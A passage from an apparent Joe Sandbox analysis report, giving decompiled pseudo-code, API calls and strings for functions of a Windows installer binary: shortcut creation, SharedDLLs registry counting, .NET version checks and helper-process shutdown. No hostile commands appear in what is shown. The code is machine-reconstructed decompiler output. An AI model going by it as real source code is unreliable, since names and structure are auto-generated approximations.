							E004595A0( *((intOrPtr*)( *((intOrPtr*)(_a44 + 8)) - 4)), _t293,  &_v60, 0x82, _t352, _t354, 0x20, 0);
							_v60 = _v24;
							E004595A0( *((intOrPtr*)( *((intOrPtr*)(_a44 + 8)) - 4)), _t293,  &_v60, 0x82, _t352, _t354, 0x20, 0);
						} else {
							_v60 = _v40;
							E004595A0( *((intOrPtr*)( *((intOrPtr*)(_a44 + 8)) - 4)), _t293,  &_v60, 0x82, _t352, _t354, 0x20, 0);
						}
					} else {
						_v60 = _v40;
						E004595A0( *((intOrPtr*)( *((intOrPtr*)(_a44 + 8)) - 4)), _t293,  &_v60, 0x81, _t352, _t354, 0x12, 0);
						E0042C3E4(_v40,  &_v48);
						E0040357C( &_v48, "target.lnk");
						_v60 = _v48;
						E004595A0( *((intOrPtr*)( *((intOrPtr*)(_a44 + 8)) - 4)), _t293,  &_v60, 0x82, _t352, _t354, 0, 0);
						E0042C3E4(_v40,  &_v48);
						E0040357C( &_v48, "Desktop.ini");
						_v60 = _v48;
						E004595A0( *((intOrPtr*)( *((intOrPtr*)(_a44 + 8)) - 4)), _t293,  &_v60, 0x82, _t352, _t354, 0, 0);
					}
				}
				E0046D164(0x3e8);
				_pop(_t332);
				 *[fs:eax] = _t332;
				_push(0x471b9b);
				E00403400( &_v48);
				E00403420( &_v40, 6);
				return E00403400( &_v8);
			}

0x00471760
0x00471761
0x00471763
0x0047176b
0x0047176e
0x00471771
0x00471774
0x00471777
0x0047177a
0x0047177d
0x00471780
0x00471782
0x00471785
0x00471788
0x0047178e
0x00471795
0x00471796
0x0047179b
0x0047179e
0x004717b2
0x004717bf
0x004717c4
0x004717ce
0x004717d9
0x004717e4
0x004717f1
0x004717fc
0x00471807
0x00471814
0x0047181f
0x0047182a
0x00471837
0x00471842
0x0047184d
0x00471852
0x0047185c
0x00471863
0x00471867
0x00471869
0x00471869
0x0047185e
0x0047185e
0x0047185e
0x00471870
0x00471876
0x0047187d
0x0047187f
0x0047187f
0x0047187d
0x0047188a
0x0047188d
0x00471891
0x004718a6
0x00471893
0x00471899
0x00471899
0x004718ae
0x004718b1
0x004718bf
0x004718c9
0x004718db
0x004718e7
0x004718f0
0x004718f8
0x00471907
0x00471918
0x00471918
0x00471920
0x00471928
0x00471931
0x004719e0
0x004719e7
0x004719f2
0x004719f7
0x00471937
0x00471959
0x00471961
0x00471966
0x0047196a
0x00471978
0x0047197c
0x0047197c
0x0047197c
0x0047197e
0x00471985
0x00471987
0x0047198b
0x00471993
0x004719a7
0x004719ab
0x004719b1
0x004719b4
0x004719c1
0x004719c8
0x004719ca
0x004719cb
0x004719cb
0x004719a7
0x0047198b
0x00471985
0x004719fb
0x00471a06
0x00471a2d
0x00471a08
0x00471a17
0x00471a17
0x00471a3a
0x00471a52
0x00471a5b
0x00471a65
0x00471afa
0x00471afe
0x00471b28
0x00471b3b
0x00471b47
0x00471b5a
0x00471b00
0x00471b07
0x00471b1a
0x00471b1a
0x00471a6b
0x00471a72
0x00471a85
0x00471a94
0x00471aa1
0x00471aa9
0x00471abc
0x00471acb
0x00471ad8
0x00471ae0
0x00471af3
0x00471af3
0x00471a65
0x00471b64
0x00471b6b
0x00471b6e
0x00471b71
0x00471b79
0x00471b86
0x00471b93

APIs

Part of subcall function 0042C7A8: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C7CC

WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00471918
SHChangeNotify.SHELL32(00000008,00000001,00000000,00000000), ref: 00471A17
SHChangeNotify.SHELL32(00000002,00000001,00000000,00000000), ref: 00471A2D
SHChangeNotify.SHELL32(00001000,00001001,00000000,00000000), ref: 00471A52

Strings

.lnk, xrefs: 004717EC
.url, xrefs: 00471832
target.lnk, xrefs: 00471A9C
Desktop.ini, xrefs: 00471AD3
.pif, xrefs: 0047180F, 0047199B
{group}\, xrefs: 004717BA
Filename: %s, xrefs: 004718BA

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ChangeNotify$FullNamePathPrivateProfileStringWrite
String ID: .lnk$.pif$.url$Desktop.ini$Filename: %s$target.lnk${group}\
API String ID: 971782779-3668018701
Opcode ID: 3c861aebd23c8d5e889efc30e43e5ed4599972638b057fa2bf766585c49557ff
Instruction ID: 0992ae993ba798985e24c5a6b7ea874dc362b29564f0bf6d942b769e2ef8478e
Opcode Fuzzy Hash: 3c861aebd23c8d5e889efc30e43e5ed4599972638b057fa2bf766585c49557ff
Instruction Fuzzy Hash: 64D11374A00149AFDB01EFA9D985BDDBBF5AF08304F50806AF804B7391D778AE45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00453A90 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 244
registryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00453A90(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				void* _v16;
				char _v17;
				char _v24;
				int _v28;
				int _v32;
				char _v36;
				char _v40;
				char* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char* _v64;
				char _v68;
				char _v72;
				void* _t75;
				void* _t94;
				void* _t99;
				void* _t103;
				char* _t106;
				void* _t129;
				void* _t164;
				void* _t169;
				intOrPtr _t187;
				intOrPtr _t191;
				intOrPtr _t193;
				void* _t205;
				void* _t206;
				intOrPtr _t207;

				_t205 = _t206;
				_t207 = _t206 + 0xffffffbc;
				_v40 = 0;
				_v52 = 0;
				_v68 = 0;
				_v72 = 0;
				_v36 = 0;
				_v8 = __edx;
				_push(_t205);
				_push(0x453d60);
				_push( *[fs:edx]);
				 *[fs:edx] = _t207;
				_v9 = 0;
				_t169 = E0042DD1C(_t75, "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs", 0x80000002,  &_v16, 3, 0);
				if(_t169 == 2) {
					L28:
					_pop(_t187);
					 *[fs:eax] = _t187;
					_push(E00453D67);
					E00403420( &_v72, 2);
					E00403400( &_v52);
					return E00403420( &_v40, 2);
				} else {
					if(_t169 != 0) {
						E00452910(0x80000002,  &_v52);
						_v48 = _v52;
						_v44 = "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs";
						E00450788(0x3d, 1,  &_v48,  &_v40);
						E0040357C( &_v40, 0x453df4);
						_push( &_v40);
						_v64 = "RegOpenKeyEx";
						E00406D48(_t169,  &_v68);
						_v60 = _v68;
						E0042E714(_t169,  &_v72);
						_v56 = _v72;
						E00450788(0x34, 2,  &_v64,  &_v52);
						_pop(_t164);
						E0040357C(_t164, _v52);
						E00408BEC(_v40, 1);
						E0040311C();
					}
					_push(_t205);
					_push(0x453d29);
					_push( *[fs:eax]);
					 *[fs:eax] = _t207;
					if(RegQueryValueExA(_v16, E00403738(_v8), 0,  &_v28, 0,  &_v32) == 0) {
						_v17 = 0;
						_v24 = 0;
						_push(_t205);
						_push(0x453c73);
						_push( *[fs:eax]);
						 *[fs:eax] = _t207;
						_t94 = _v28 - 1;
						if(_t94 == 0) {
							if(E0042DC4C() != 0) {
								_v24 = E00406D78(_v36,  &_v36);
								_v17 = 1;
							}
						} else {
							_t129 = _t94 - 2;
							if(_t129 == 0) {
								if(_v32 >= 1 && _v32 <= 4 && RegQueryValueExA(_v16, E00403738(_v8), 0, 0,  &_v24,  &_v32) == 0) {
									_v17 = 1;
								}
							} else {
								if(_t129 == 1) {
									_v32 = 4;
									if(RegQueryValueExA(_v16, E00403738(_v8), 0, 0,  &_v24,  &_v32) == 0) {
										_v17 = 1;
									}
								}
							}
						}
						_pop(_t191);
						 *[fs:eax] = _t191;
						if(_v17 != 0) {
							_v24 = _v24 - 1;
							if(_v24 > 0) {
								_t99 = _v28 - 1;
								if(_t99 == 0) {
									E00406D48(_v24,  &_v36);
									_t103 = E00403574(_v36);
									_t106 = E00403738(_v36);
									RegSetValueExA(_v16, E00403738(_v8), 0, 1, _t106, _t103 + 1);
								} else {
									if(_t99 + 0xfffffffe - 2 < 0) {
										RegSetValueExA(_v16, E00403738(_v8), 0, _v28,  &_v24, 4);
									}
								}
							} else {
								_v9 = 1;
								RegDeleteValueA(_v16, E00403738(_v8));
							}
							_pop(_t193);
							 *[fs:eax] = _t193;
							_push(E00453D30);
							return RegCloseKey(_v16);
						} else {
							E004031BC();
							goto L28;
						}
					} else {
						E004031BC();
						goto L28;
					}
				}
			}

0x00453a91
0x00453a93
0x00453a9b
0x00453a9e
0x00453aa1
0x00453aa4
0x00453aa7
0x00453aaa
0x00453aaf
0x00453ab0
0x00453ab5
0x00453ab8
0x00453abb
0x00453ad6
0x00453adb
0x00453d30
0x00453d32
0x00453d35
0x00453d38
0x00453d45
0x00453d4d
0x00453d5f
0x00453ae1
0x00453ae3
0x00453af5
0x00453afd
0x00453b05
0x00453b12
0x00453b1f
0x00453b27
0x00453b31
0x00453b39
0x00453b41
0x00453b49
0x00453b51
0x00453b5e
0x00453b66
0x00453b67
0x00453b76
0x00453b7b
0x00453b7b
0x00453b82
0x00453b83
0x00453b88
0x00453b8b
0x00453bb0
0x00453bbc
0x00453bc2
0x00453bc7
0x00453bc8
0x00453bcd
0x00453bd0
0x00453bd6
0x00453bd7
0x00453bf5
0x00453bff
0x00453c02
0x00453c02
0x00453bd9
0x00453bd9
0x00453bdc
0x00453c0c
0x00453c36
0x00453c36
0x00453bde
0x00453bdf
0x00453c3c
0x00453c63
0x00453c65
0x00453c65
0x00453c63
0x00453bdf
0x00453bdc
0x00453c6b
0x00453c6e
0x00453c81
0x00453c8d
0x00453c94
0x00453cb1
0x00453cb2
0x00453cc4
0x00453ccc
0x00453cd6
0x00453ced
0x00453cb4
0x00453cba
0x00453d0d
0x00453d0d
0x00453cba
0x00453c96
0x00453c96
0x00453ca7
0x00453ca7
0x00453d14
0x00453d17
0x00453d1a
0x00453d28
0x00453c83
0x00453c83
0x00000000
0x00453c83
0x00453bb2
0x00453bb2
0x00000000
0x00453bb2
0x00453bb0

APIs

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegQueryValueExA.ADVAPI32(00459F06,00000000,00000000,?,00000000,?,00000000,00453D29,?,00459F06,00000003,00000000,00000000,00453D60), ref: 00453BA9

Part of subcall function 0042E714: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004525D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E733

RegQueryValueExA.ADVAPI32(00459F06,00000000,00000000,00000000,?,00000004,00000000,00453C73,?,00459F06,00000000,00000000,?,00000000,?,00000000), ref: 00453C2D
RegQueryValueExA.ADVAPI32(00459F06,00000000,00000000,00000000,?,00000004,00000000,00453C73,?,00459F06,00000000,00000000,?,00000000,?,00000000), ref: 00453C5C

Strings

, xrefs: 00453B1A
RegOpenKeyEx, xrefs: 00453B2C
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453AC7
Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453B00

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: QueryValue$FormatMessageOpen
String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
API String ID: 2812809588-1577016196
Opcode ID: 2f5bc4a744adbce7fd285ef0f8126a27f236a6475566dd397988e894d4f3c327
Instruction ID: a85c13ee8c1e40c871d21152284f25a34c1515a6952d09ef2720c3a63fe562ad
Opcode Fuzzy Hash: 2f5bc4a744adbce7fd285ef0f8126a27f236a6475566dd397988e894d4f3c327
Instruction Fuzzy Hash: 4B913671A04208ABDB11DF99C945BDEB7F8EB08346F50406BF901F7282D6799F09CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004587F4 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 165
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004587F4(signed int __eax, void* __ebx, void* __ecx, signed int __edx, void* __edi, void* __esi) {
				signed int _v5;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				signed int _t130;
				intOrPtr _t162;
				signed int _t175;
				signed int _t177;
				void* _t183;
				void* _t186;

				_t185 = _t186;
				_v16 = 0;
				_t183 = __ecx;
				_v5 = __edx;
				_t130 = __eax;
				_push(_t186);
				_push(0x4589f5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t186 + 0xffffffec;
				if( *0x0049AFEC != 0) {
					L16:
					E00403494(_t183,  *((intOrPtr*)(0x49afec)));
					_pop(_t162);
					 *[fs:eax] = _t162;
					_push(E004589FC);
					return E00403400( &_v16);
				}
				E00458700(__eax, __ecx,  &_v16, _t185);
				if(_v5 + 0xfe - 2 >= 0 || E0042DD1C(_t130, "SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v4.0", 0x80000002,  &_v12, 1, 0) != 0) {
					_t79 = _v5 - 1;
					__eflags = _t79;
					if(_t79 == 0) {
						L6:
						_t82 = E0042DD1C(_t130, "SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v2.0", 0x80000002,  &_v12, 1, 0);
						__eflags = _t82;
						if(_t82 != 0) {
							L8:
							_t83 = _v5;
							__eflags = _t83;
							if(_t83 == 0) {
								L10:
								__eflags = E0042DD1C(_t130, "SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v1.1", 0x80000002,  &_v12, 1, 0);
								if(__eflags == 0) {
									_t177 = _t130 & 0x0000007f;
									E0042C3E4( *((intOrPtr*)(0x49afe0 + _t177 * 4)),  &_v16);
									_t142 = _t177 + _t177;
									__eflags = _t177 + _t177;
									E004035C0(0x49afec + _t142 * 8, "v1.1.4322", _v16);
									RegCloseKey(_v12);
								}
								goto L12;
							}
							__eflags = _t83 - 3;
							if(__eflags != 0) {
								goto L12;
							}
							goto L10;
						} else {
							_t179 = _t130 & 0x0000007f;
							E0042C3E4( *((intOrPtr*)(0x49afe0 + (_t130 & 0x0000007f) * 4)),  &_v16);
							E004035C0(0x49afec + (_t179 + _t179) * 8, "v2.0.50727", _v16);
							RegCloseKey(_v12);
							goto L12;
						}
					}
					__eflags = _t79 != 2;
					if(_t79 != 2) {
						goto L8;
					}
					goto L6;
				} else {
					_t181 = _t130 & 0x0000007f;
					E0042C3E4( *((intOrPtr*)(0x49afe0 + (_t130 & 0x0000007f) * 4)),  &_v16);
					E004035C0(0x49afec + (_t181 + _t181) * 8, "v4.0.30319", _v16);
					RegCloseKey(_v12);
					L12:
					_t175 = _v5 & 0x000000ff;
					if( *((intOrPtr*)(0x49afec + _t175 * 4)) == 0) {
						_t192 = _v5 - 3;
						if(_v5 == 3) {
							E004526A4(".NET Framework not found", _t130, _t175, _t183, __eflags);
						} else {
							_v24 =  *((intOrPtr*)(0x498b08 + _t175 * 4));
							_v20 = 0xb;
							E004078D4(".NET Framework version %s not found", 0,  &_v24,  &_v16);
							E004526A4(_v16, _t130, _t175, _t183, _t192);
						}
					}
					goto L16;
				}
			}

0x004587f5
0x004587ff
0x00458802
0x00458804
0x00458807
0x0045880b
0x0045880c
0x00458811
0x00458814
0x0045882d
0x004589c3
0x004589da
0x004589e1
0x004589e4
0x004589e7
0x004589f4
0x004589f4
0x00458838
0x00458844
0x004588a8
0x004588a8
0x004588aa
0x004588b0
0x004588c4
0x004588c9
0x004588cb
0x0045890c
0x0045890c
0x0045890f
0x00458911
0x00458917
0x00458930
0x00458932
0x00458939
0x00458943
0x00458952
0x00458952
0x00458963
0x0045896c
0x0045896c
0x00000000
0x00458932
0x00458913
0x00458915
0x00000000
0x00000000
0x00000000
0x004588cd
0x004588d2
0x004588dc
0x004588fc
0x00458905
0x00000000
0x00458905
0x004588cb
0x004588ac
0x004588ae
0x00000000
0x00000000
0x00000000
0x00458863
0x00458868
0x00458872
0x00458892
0x0045889b
0x00458971
0x00458971
0x00458986
0x00458988
0x0045898c
0x004589be
0x0045898e
0x00458999
0x0045899c
0x004589aa
0x004589b2
0x004589b2
0x0045898c
0x00000000
0x00458986

APIs

Part of subcall function 00458700: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,0045883D,00000000,004589F5,?,00000000,00000000,00000000), ref: 0045874D

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004589F5,?,00000000,00000000,00000000), ref: 0045889B
RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004589F5,?,00000000,00000000,00000000), ref: 00458905

Part of subcall function 0042DD1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481B1F,?,00000001,?,?,00481B1F,?,00000001,00000000), ref: 0042DD38

RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000000,004589F5,?,00000000,00000000,00000000), ref: 0045896C

Strings

.NET Framework version %s not found, xrefs: 004589A5
v4.0.30319, xrefs: 0045888D
v1.1.4322, xrefs: 0045895E
v2.0.50727, xrefs: 004588F7
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 0045891F
.NET Framework not found, xrefs: 004589B9
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004588B8
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0, xrefs: 0045884E

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Close$Open
String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$SOFTWARE\Microsoft\.NETFramework\Policy\v4.0$v1.1.4322$v2.0.50727$v4.0.30319
API String ID: 2976201327-446240816
Opcode ID: ae5b2de95357e92415c190aea35426584579c2de5f715865d6501eb2e45b7b44
Instruction ID: dc764d86b7292572b156a26407ef2df84fe17423a8d01080f67fb36ac38d1474
Opcode Fuzzy Hash: ae5b2de95357e92415c190aea35426584579c2de5f715865d6501eb2e45b7b44
Instruction Fuzzy Hash: A051C175A04144AFCB00DBA4C8A1BEE77A6EB49305F54447FE801E7382DF399A0ACB59

Uniqueness

Uniqueness Score: -1.00%

Function 00457DE0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70
sleepsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00457DE0(intOrPtr __eax, void* __edx) {
				long _v12;
				long _v16;
				void* __ebx;
				void* __esi;
				void* _t44;
				void* _t50;
				intOrPtr _t51;
				DWORD* _t52;

				_t19 = __eax;
				_t52 =  &_v12;
				_t44 = __edx;
				_t51 = __eax;
				if( *((char*)(__eax + 4)) == 0) {
					L11:
					return _t19;
				}
				 *((char*)(__eax + 5)) = 1;
				_v16 =  *((intOrPtr*)(__eax + 0x10));
				_v12 = 0;
				E00456D64("Stopping 64-bit helper process. (PID: %u)", __edx, 0,  &_v16, _t50, __eax);
				CloseHandle( *(_t51 + 0xc));
				 *(_t51 + 0xc) = 0;
				while(WaitForSingleObject( *(_t51 + 8), 0x2710) == 0x102) {
					E00456B58("Helper isn\'t responding; killing it.", _t44, 0, _t50, _t51);
					TerminateProcess( *(_t51 + 8), 1);
				}
				if(GetExitCodeProcess( *(_t51 + 8), _t52) == 0) {
					E00456B58("Helper process exited, but failed to get exit code.", _t44, 0, _t50, _t51);
				} else {
					if( *_t52 != 0) {
						_v16 =  *_t52;
						_v12 = 0;
						E00456D64("Helper process exited with failure code: 0x%x", _t44, 0,  &_v16, _t50, _t51);
					} else {
						E00456B58("Helper process exited.", _t44, 0, _t50, _t51);
					}
				}
				CloseHandle( *(_t51 + 8));
				 *(_t51 + 8) = 0;
				_t19 = 0;
				 *((intOrPtr*)(_t51 + 0x10)) = 0;
				 *((char*)(_t51 + 4)) = 0;
				if(_t44 == 0) {
					goto L11;
				} else {
					Sleep(0xfa);
					return 0;
				}
			}

0x00457de0
0x00457de2
0x00457de5
0x00457de7
0x00457ded
0x00457ebf
0x00457ebf
0x00457ebf
0x00457df3
0x00457dfa
0x00457dfe
0x00457e0e
0x00457e17
0x00457e1e
0x00457e38
0x00457e28
0x00457e33
0x00457e33
0x00457e59
0x00457e90
0x00457e5b
0x00457e5f
0x00457e70
0x00457e74
0x00457e84
0x00457e61
0x00457e66
0x00457e66
0x00457e5f
0x00457e99
0x00457ea0
0x00457ea3
0x00457ea5
0x00457ea8
0x00457eae
0x00000000
0x00457eb0
0x00457eb5
0x00000000
0x00457eb5

APIs

CloseHandle.KERNEL32(?), ref: 00457E17
TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 00457E33
WaitForSingleObject.KERNEL32(?,00002710,?), ref: 00457E41
GetExitCodeProcess.KERNEL32 ref: 00457E52
CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00457E99
Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 00457EB5

Strings

Stopping 64-bit helper process. (PID: %u), xrefs: 00457E09
Helper isn't responding; killing it., xrefs: 00457E23
Helper process exited., xrefs: 00457E61
Helper process exited with failure code: 0x%x, xrefs: 00457E7F
Helper process exited, but failed to get exit code., xrefs: 00457E8B

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
API String ID: 3355656108-1243109208
Opcode ID: e825d92f2b2fc0fa956f4be6408a2feecf788506d4b2e8ffbfb242e0758c715c
Instruction ID: 05a953fdd12f8ddcbd202f73b1070c517b89d081868d4b30a6641c1e9efdef7c
Opcode Fuzzy Hash: e825d92f2b2fc0fa956f4be6408a2feecf788506d4b2e8ffbfb242e0758c715c
Instruction Fuzzy Hash: 1D215C716087409AC720EB79D44675BB6D59F08305F00CD7FF99ACB283D778E8488B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00453744 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 228
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00453744(void* __ebx, signed int __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _v5;
				void* _v12;
				char _v16;
				int _v20;
				char _v24;
				int _v28;
				int _v32;
				char _v36;
				char* _v40;
				char _v44;
				char* _v48;
				char _v52;
				char _v56;
				char _v60;
				intOrPtr _v64;
				char* _v68;
				char _v72;
				char _v76;
				void* _t81;
				void* _t82;
				signed int _t92;
				void* _t96;
				void* _t100;
				void* _t127;
				void* _t132;
				void* _t164;
				intOrPtr _t186;
				intOrPtr _t188;
				void* _t201;
				void* _t203;
				void* _t204;
				intOrPtr _t205;

				_t203 = _t204;
				_t205 = _t204 + 0xffffffb8;
				_v44 = 0;
				_v56 = 0;
				_v72 = 0;
				_v76 = 0;
				_v36 = 0;
				_v5 = __ecx;
				_t201 = __edx;
				_push(_t203);
				_push(0x4539df);
				_push( *[fs:edx]);
				 *[fs:edx] = _t205;
				_t82 = E0042DCE4(_t81, "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs", 0x80000002,  &_v16,  &_v12, 0, 3, 0, 0, 0);
				_t170 = _t82;
				if(_t82 != 0) {
					E00452910(0x80000002,  &_v56);
					_v52 = _v56;
					_v48 = "Software\\Microsoft\\Windows\\CurrentVersion\\SharedDLLs";
					E00450788(0x3d, 1,  &_v52,  &_v44);
					E0040357C( &_v44, 0x453a70);
					_push( &_v44);
					_v68 = "RegCreateKeyEx";
					E00406D48(_t170,  &_v72);
					_v64 = _v72;
					E0042E714(_t170,  &_v76);
					_v60 = _v76;
					E00450788(0x34, 2,  &_v68,  &_v56);
					_pop(_t164);
					E0040357C(_t164, _v56);
					E00408BEC(_v44, 1);
					E0040311C();
				}
				_v40 = E00403738(_t201);
				_v24 = 0;
				_v32 = 4;
				_push(_t203);
				_push(0x45391b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t205;
				if(RegQueryValueExA(_v12, _v40, 0,  &_v28, 0,  &_v20) == 0) {
					_t127 = _v28 - 1;
					if(_t127 == 0) {
						if(E0042DC4C() != 0) {
							_v24 = E00406D78(_v36,  &_v36);
							_v32 = 1;
						}
					} else {
						_t132 = _t127 - 2;
						if(_t132 == 0) {
							if(_v20 >= 1 && _v20 <= 4) {
								if(RegQueryValueExA(_v12, _v40, 0, 0,  &_v24,  &_v20) != 0) {
									E00408BC0();
								}
								_v32 = 3;
							}
						} else {
							if(_t132 == 1) {
								_v20 = 4;
								if(RegQueryValueExA(_v12, _v40, 0, 0,  &_v24,  &_v20) != 0) {
									E00408BC0();
								}
							}
						}
					}
				}
				_t92 = 0;
				_pop(_t186);
				 *[fs:eax] = _t186;
				if(_v24 < 0) {
					_t92 = 0;
					_v24 = 0;
				}
				if(((_t92 & 0xffffff00 | _v24 == 0x00000000) & _v5) != 0) {
					_v24 = _v24 + 1;
				}
				_v24 = _v24 + 1;
				_t96 = _v32 - 1;
				if(_t96 == 0) {
					E00406D48(_v24,  &_v36);
					_t100 = E00403574(_v36);
					RegSetValueExA(_v12, _v40, 0, _v32, E00403738(_v36), _t100 + 1);
				} else {
					if(_t96 + 0xfffffffe - 2 < 0) {
						RegSetValueExA(_v12, _v40, 0, _v32,  &_v24, 4);
					}
				}
				RegCloseKey(_v12);
				_pop(_t188);
				 *[fs:eax] = _t188;
				_push(0x4539e6);
				E00403420( &_v76, 2);
				E00403400( &_v56);
				E00403400( &_v44);
				return E00403400( &_v36);
			}

0x00453745
0x00453747
0x0045374f
0x00453752
0x00453755
0x00453758
0x0045375b
0x0045375e
0x00453761
0x00453765
0x00453766
0x0045376b
0x0045376e
0x0045378d
0x00453792
0x00453796
0x004537a8
0x004537b0
0x004537b8
0x004537c5
0x004537d2
0x004537da
0x004537e4
0x004537ec
0x004537f4
0x004537fc
0x00453804
0x00453811
0x00453819
0x0045381a
0x00453829
0x0045382e
0x0045382e
0x0045383a
0x0045383f
0x00453842
0x0045384b
0x0045384c
0x00453851
0x00453854
0x00453872
0x0045387b
0x0045387c
0x0045389b
0x004538a5
0x004538a8
0x004538a8
0x0045387e
0x0045387e
0x00453881
0x004538b5
0x004538d8
0x004538da
0x004538da
0x004538df
0x004538df
0x00453883
0x00453884
0x004538e8
0x0045390a
0x0045390c
0x0045390c
0x0045390a
0x00453884
0x00453881
0x0045387c
0x00453911
0x00453913
0x00453916
0x0045392e
0x00453930
0x00453932
0x00453932
0x0045393f
0x00453941
0x00453941
0x00453944
0x0045394a
0x0045394b
0x0045395d
0x00453965
0x00453983
0x0045394d
0x00453953
0x0045399e
0x0045399e
0x00453953
0x004539a7
0x004539ae
0x004539b1
0x004539b4
0x004539c1
0x004539c9
0x004539d1
0x004539de

APIs

Part of subcall function 0042DCE4: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD10

